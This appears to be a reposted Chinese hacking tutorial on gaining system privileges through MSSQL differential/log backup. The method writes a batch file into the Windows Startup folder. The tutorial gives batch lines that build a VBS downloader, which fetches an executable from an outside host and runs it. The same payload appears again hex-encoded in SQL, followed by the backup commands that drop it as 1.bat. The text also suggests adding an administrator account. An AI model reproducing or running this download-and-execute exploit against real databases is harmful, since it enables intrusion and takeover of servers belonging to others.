下面是是在網(wǎng)上找到的資料和動畫. TEAM里的內(nèi)部資料放久了,現(xiàn)在不放出來,遲早會有人發(fā)掘出來的！既然如此就拿出來大家分享吧！
MSSQL差異備份獲取webshell幾乎人人皆知,那么我們可以利用差異備份出來的文件當(dāng)作惡意代碼
讓系統(tǒng)執(zhí)行了之后自動提升權(quán)限或者添加管理員嗎？答案當(dāng)然可以了,kj021320測試了N次之后跟你說！ 那么我們得考慮文件擺放的位置~什么地方系統(tǒng)會運(yùn)行呢？這個其實(shí)算是廢話吧！
大家不用想都知道通用地方C:\DocumentsandSettings\AllUsers\「開始」菜單\程序\啟動
呵呵位置有了！　那么我們備份什么文件讓系統(tǒng)能執(zhí)行的呢？
這個是第一個關(guān)鍵點(diǎn)~！
EXEJSVBSBAT這些文件大家第一時間想到的了
那些我一個一個來分析exe的話！絕對能了！但是MSSQL差異備份這么多垃圾肯定會把exe弄壞的！
否決掉
然后到腳本
VBS我們能不能把他的垃圾信息注釋掉呢？不然VBS會執(zhí)行不了！OK學(xué)過VBS的朋友都知道
VBS里面有2種注釋'還有就是rem
但是還是會有垃圾信息屏蔽不了
否決掉 JS呢？JS里面有多行注釋的/**/但是/*不可能在首行吧？
否決掉 最后剩下我們最熟悉的bat批處理了！
OK我們繼續(xù)分析bat里面注釋是什么呢？也是REM,失敗?。≈皏bs那里不行這里的rem注釋也一樣不行的！
那么我們怎么辦呢？其實(shí)很簡單！當(dāng)我們在CMD下面敲錯了命令系統(tǒng)會怎樣呢？ 說到這里要是大家不往文章下面看也一樣能想到方法了吧~ OK我們繼續(xù)探~~這里是最最關(guān)鍵點(diǎn),差異備份出來的垃圾信息我們可以通過用回車把他提交了！
而系統(tǒng)只當(dāng)作無用的命令來處理！不影響我們的操作！
問題就這樣解決了嗎？不是的！~MSSQL備份的時候,到一定的字符長度就會出現(xiàn)垃圾的字符,那個字符會影響我們的操作！
那么我們得把語句盡量縮少,越少越好~
OK那我們思路好了就采用bat寫一個VBS的下載者然后執(zhí)行這個下載者最后通過下載者down回來的馬子來獲取系統(tǒng)權(quán)限
下面是我改過的生成下載者的BAT echoSetP=createObject("Microsoft.XMLHTTP")>k.vbs
echoP.Open"GET","http://www.isto.cn/t.exe",0>>k.vbs
echoP.Send():setG=createObject("ADODB.Stream")>>k.vbs
echoG.Mode=3:G.Type=1:G.Open()>>k.vbs
echoG.WriteP.ResponseBody:G.SaveToFile"t.exe",2>>k.vbs
k.vbs
t 下一個k.VBS然后k.vbs下載一個t.exe文件保存到本地直接執(zhí)行
記得記得我說過的代碼前面一定要用回車把垃圾數(shù)據(jù)提交最好2以上個回車
然后實(shí)現(xiàn)差異備份 alterdatabaseISTOsetRECOVERYFULL--
createtablecmd(aimage)--
backuplogISTOtodisk='c:\cmd1'withinit--
insertintocmd(a)values(0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372 6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2 022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30 203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561 74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65 63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B 2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64 793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A 6B2E7662730D0A740D0A)--
backuplogISTOtodisk='C:\DocumentsandSettings\AllUsers\「開始」菜單\程序\啟動\1.bat'--
droptablecmd-- OKbat出來了！至于怎樣讓服務(wù)器重啟呢！這個問題遺留給你們?nèi)ビ懻摪桑?
要是服務(wù)器直接開啟了3389那就更方便了！直接bat一個添加管理員的命令更爽！ isto是動畫里用到的工具.
isto輔助轉(zhuǎn)換工具.rar
mssql差異備份取系統(tǒng)權(quán)限.rar

國外服務(wù)器租用

版權(quán)聲明：本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學(xué)習(xí)參考，不代表本站立場，如有內(nèi)容涉嫌侵權(quán)，請聯(lián)系alex-e#qq.com處理。